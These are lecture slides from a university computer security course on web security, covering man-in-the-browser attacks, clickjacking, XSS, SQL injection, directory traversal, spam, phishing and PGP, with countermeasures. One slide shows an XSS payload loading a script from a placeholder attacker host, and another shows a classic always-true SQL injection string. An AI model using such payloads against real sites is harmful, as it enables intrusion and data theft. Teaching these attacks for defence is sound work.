1

CSIT 561 – COMPUTER SECURITY

MODULE 6 : WEB SECURITY

Bharath K. Samanthula
Department of Computer Science
Montclair State University

Slides are adopted from Chapter 12, Security in Computing, Fifth Edition, by Charles P. Pfleeger, et al. (ISBN: 9780134085043)..
 2

Objectives
• Attacks against browsers
• Fake and malicious websites
• Attacks targeting sensitive data
• Injection attacks
• Spam
• Phishing attacks

From Security in Computing, Fifth Edition, by Charles P. Pfleeger, et al. (ISBN: 9780134085043). Copyright 2015 by Pearson Education, Inc. All rights reserved.
 3

Browser Vulnerabilities
1000
900 897
800 731 727
700
600
500 441
400
300
208 207
200
100
0
2008 2009 2010 2011 2012 2013

From Security in Computing, Fifth Edition, by Charles P. Pfleeger, et al. (ISBN: 9780134085043). Copyright 2015 by Pearson Education, Inc. All rights reserved.
 4

Browser Attack Types

• Man-in-the-browser
• Trojan horse that intercepts data passing via
the browser
• Example: Symantec researchers identified a
trojan horse, called as SilentBanker (2008)
• Keystroke logger
• Page-in-the-middle
• Program download substitution
• User-in-the-middle
From Security in Computing, Fifth Edition, by Charles P. Pfleeger, et al. (ISBN: 9780134085043). Copyright 2015 by Pearson Education, Inc. All rights reserved.
 5

Man-in-the-Browser

Encrypted data
Browser
User types transferred to
encrypts
bank

BANK

SilentBanker
intercepts

SilentBanker was a Trojan that generally installed as a browser plug-in.

When it detected the user going to a banking URL, it would intercept
keystrokes and even modify them so that money transfers would go to
attackers’ accounts.
From Security in Computing, Fifth Edition, by Charles P. Pfleeger, et al. (ISBN: 9780134085043). Copyright 2015 by Pearson Education, Inc. All rights reserved.
 6

Keystroke Logger
• Hardware or software that records all
keystrokes
• May be a small dongle plugged into a USB
port or can masquerade as a keyboard
• May also be installed as malware
• Not limited to browsers

From Security in Computing, Fifth Edition, by Charles P. Pfleeger, et al. (ISBN: 9780134085043). Copyright 2015 by Pearson Education, Inc. All rights reserved.
 7

Page-in-the-Middle
• User is directed to a different page than
believed or intended
• Similar effect to a man-in-the-browser,
where attacker can intercept and modify
user input

From Security in Computing, Fifth Edition, by Charles P. Pfleeger, et al. (ISBN: 9780134085043). Copyright 2015 by Pearson Education, Inc. All rights reserved.
 8

Program Download Substitution

• Attacker creates a page with seemingly
innocuous and desirable programs for download
• Instead of, or in addition to, the intended
functionality, the user installs malware
• This is a very common technique for spyware

From Security in Computing, Fifth Edition, by Charles P. Pfleeger, et al. (ISBN: 9780134085043). Copyright 2015 by Pearson Education, Inc. All rights reserved.
 9

User-in-the-Middle
• CAPTCHAs are used by websites to
defeat automation, such as by
preventing spammers from scripting the
creation of massive numbers of email
accounts. By using dummy websites to
entice users into solving CAPTCHAs,
attackers can effectively defeat the
CAPTCHAs at scale.

• Using click-bait to trick users into

solving CAPTCHAs on spammers’
behalf

• Petmail (http://petmail.lothar.com) is an
anti-spam email system, but still
susceptible attacks, such as man-in-the
middle attack

From Security in Computing, Fifth Edition, by Charles P. Pfleeger, et al. (ISBN: 9780134085043). Copyright 2015 by Pearson Education, Inc. All rights reserved.
 10

Successful Authentication
• The attacks listed above are largely failures of
authentication
• Can be mitigated with
• Shared secret – known only to communicating parties
• Security question, time of last login, etc.
• One-time password
• RSA SecurID tokens discussed earlier
• Out-of-band communication
• Transferring one fact along a communication path seprate
from that of another fact
• PINs delivered separately from the bank card mail

From Security in Computing, Fifth Edition, by Charles P. Pfleeger, et al. (ISBN: 9780134085043). Copyright 2015 by Pearson Education, Inc. All rights reserved.
 11

Fake Website

From Security in Computing, Fifth Edition, by Charles P. Pfleeger, et al. (ISBN: 9780134085043). Copyright 2015 by Pearson Education, Inc. All rights reserved.
 12

Fake Code

From Security in Computing, Fifth Edition, by Charles P. Pfleeger, et al. (ISBN: 9780134085043). Copyright 2015 by Pearson Education, Inc. All rights reserved.
 13

Protecting Web Sites Against Change

• Integrity Checksums
• Generate hash value for each code or data placed on the server
• Admins compares the new and original hashes to determine
whether any changes have occurred
• Tripwire program: well-known Integrity checking tool
• Digital signatures for client-side assurance

From Security in Computing, Fifth Edition, by Charles P. Pfleeger, et al. (ISBN: 9780134085043). Copyright 2015 by Pearson Education, Inc. All rights reserved.
 14

Tracking Bug
A tiny image served
Web
bugs
up from one provider
(“ClicksRUs”) that
allows user behavior
to be tracked across
many sites for
advertising purposes.
Students probably
notice this when they
see web ads that
Florist Bakery offer up items very
1 Targeted ad 2 similar to ones
they’ve recently been
3
Visit from 200.100.1.10 Visit from 200.100.1.10 shopping for on other
sites. Web bugs can
also be used to track
users’ reading of
advertising emails.
ClicksRUs

From Security in Computing, Fifth Edition, by Charles P. Pfleeger, et al. (ISBN: 9780134085043). Copyright 2015 by Pearson Education, Inc. All rights reserved.
 15

Clickjacking
• Clickjacking is a way of tricking users into providing
desired input.
• The attacker makes the input dialog transparent and
places an image with an enticement below the
transparent dialog. The user ends up answering a
question he didn’t even know he was being asked,
unknowingly authorizing his computer to execute the
attacker’s will. “Framing”—moving and layering HTML
iframes—is an important component of this attack.

From Security in Computing, Fifth Edition, by Charles P. Pfleeger, et al. (ISBN: 9780134085043). Copyright 2015 by Pearson Education, Inc. All rights reserved.
 16

Clickjacking
Do you want to perform
this dangerous act?

[Yes] [No]

For a Free Prize

Click

[Here]

From Security in Computing, Fifth Edition, by Charles P. Pfleeger, et al. (ISBN: 9780134085043). Copyright 2015 by Pearson Education, Inc. All rights reserved.
 17

Facebook Clickjack Attack

• In Summer 2010, FB users tricked into posting that they
liked a particular site.
• Victims tried to click on the links that many of their friends
liked, related to World Cup tennis match
• Another message popped up asking them to confirm they were
over age 18
• What the victims did not see: An invisible box asking them to
confirm they liked the target website

From Security in Computing, Fifth Edition, by Charles P. Pfleeger, et al. (ISBN: 9780134085043). Copyright 2015 by Pearson Education, Inc. All rights reserved.
 18

Drive-By Download
• Code is downloaded, installed, and executed on a
computer without the user’s knowledge
• May be the result of clickjacking, fake code, program
download subsitution, etc.

Unwanted browser toolbars are an example that just about every student
will have had experience with.

From Security in Computing, Fifth Edition, by Charles P. Pfleeger, et al. (ISBN: 9780134085043). Copyright 2015 by Pearson Education, Inc. All rights reserved.
 19

Cross-Site Scripting (XSS)

• Tricking a client or server into executing scripted code by
including the code in data inputs
• Scripts and HTML tags are encoded as plaintext just like
user inputs, so they can take over web pages similarly to
the way buffer overflow attacks can take over programs

Cool<br>story.<br>KCTVBigFan<script
src=http://badsite.com/xss.js></script>

From Security in Computing, Fifth Edition, by Charles P. Pfleeger, et al. (ISBN: 9780134085043). Copyright 2015 by Pearson Education, Inc. All rights reserved.
 20

XSS

From Security in Computing, Fifth Edition, by Charles P. Pfleeger, et al. (ISBN: 9780134085043). Copyright 2015 by Pearson Education, Inc. All rights reserved.
 21

SQL Injection
• Injecting SQL code into an exchange between an
application and its database server
• Example:
• Loading an SQL query into a variable, taking the value of acctNum
from an arbitrary user input field:
• QUERY = "SELECT * FROM trans WHERE acct = '" + acctNum + " '; "

• The same query with malicious user input:

• QUERY = "SELECT * FROM trans WHERE acct = '2468' OR '1'='1'; "

From Security in Computing, Fifth Edition, by Charles P. Pfleeger, et al. (ISBN: 9780134085043). Copyright 2015 by Pearson Education, Inc. All rights reserved.
 22

Dot-Dot-Slash
• Also known as “directory traversal,” this is when attackers
use the term “../” to access files that are on the target web
server but not meant to be accessed from outside
• Most commonly entered into the URL bar but may also be
combined with other attacks, such as XSS

From Security in Computing, Fifth Edition, by Charles P. Pfleeger, et al. (ISBN: 9780134085043). Copyright 2015 by Pearson Education, Inc. All rights reserved.
 23

Server-Side Include (SSI)

• SSI is an interpreted server-side scripting language that
can be used for basic web server directives, such as
including files and executing commands
• As is the case with XSS, some websites are vulnerable to
allowing users to execute SSI directives through text input

From Security in Computing, Fifth Edition, by Charles P. Pfleeger, et al. (ISBN: 9780134085043). Copyright 2015 by Pearson Education, Inc. All rights reserved.
 24

Countermeasures to Injections
• Filter and sanitize all user input
• Need to account for every potentially valid encoding
• Make no assumptions about the range of possible user
inputs—trust nothing, check everything
• Use access control mechanisms on backend servers,
such as “stored procedures”

From Security in Computing, Fifth Edition, by Charles P. Pfleeger, et al. (ISBN: 9780134085043). Copyright 2015 by Pearson Education, Inc. All rights reserved.
 25

Email Spam
• Experts estimate that 60% to 90% of all email is spam
• Types of spam:
• Advertising
• Pharmaceuticals
• Stocks
• Malicious code
• Links for malicious websites
• Spam countermeasures
• Laws against spam exist but are generally ineffective
• CAN-SPAM act in US and Directive 2002/58/EC of the EU
• Email filters have become very effective for most spam
• Internet service providers use volume limitations to make
spammers’ jobs more difficult
From Security in Computing, Fifth Edition, by Charles P. Pfleeger, et al. (ISBN: 9780134085043). Copyright 2015 by Pearson Education, Inc. All rights reserved.
 26

Phishing
• A message that tries to trick a victim into providing private
information or taking some other unsafe action
• Spear phishing: A targeted attack that is personalized to a
particular recipient or set of recipients

From Security in Computing, Fifth Edition, by Charles P. Pfleeger, et al. (ISBN: 9780134085043). Copyright 2015 by Pearson Education, Inc. All rights reserved.
 27

Countermeasures
• User education
• Limited effectiveness and very subject to co-evolution with attacks
• PGP and S/MIME
• Cryptographic solutions that have seen very limited adoption after
years on the market

From Security in Computing, Fifth Edition, by Charles P. Pfleeger, et al. (ISBN: 9780134085043). Copyright 2015 by Pearson Education, Inc. All rights reserved.
 28

PGP
Developed by Phil Zimmerman in 1991
Performs some or all of the following steps
1. Create a random session key for symmetric algorithm
2. Encrypt the message, using session key (for message
confidentiality)
3. Encrypt the session key under the recipient's public key
4. Generate hash value of the message and digitally sign it
using sender’s private key (for message integrity and
authenticity)
5. Attach the encrypted session key to the encrypted message
and digest
6. Transmit the message to the recipient
The recipient reverses the above steps to retrieve and validate
the message
From Security in Computing, Fifth Edition, by Charles P. Pfleeger, et al. (ISBN: 9780134085043). Copyright 2015 by Pearson Education, Inc. All rights reserved.
 29

Summary
• As web browsers have become a primary focus of users
and taken on greater functionality, they’ve become a focus
of many types of attack
• Browser and website weaknesses are often the result of
some form of poor authentication
• Many attackers focus on tricking users with fake websites,
misleading applications, and phishing emails
• On the server side, injection attacks are a key concern,
and countermeasures to prevent them are critical

From Security in Computing, Fifth Edition, by Charles P. Pfleeger, et al. (ISBN: 9780134085043). Copyright 2015 by Pearson Education, Inc. All rights reserved.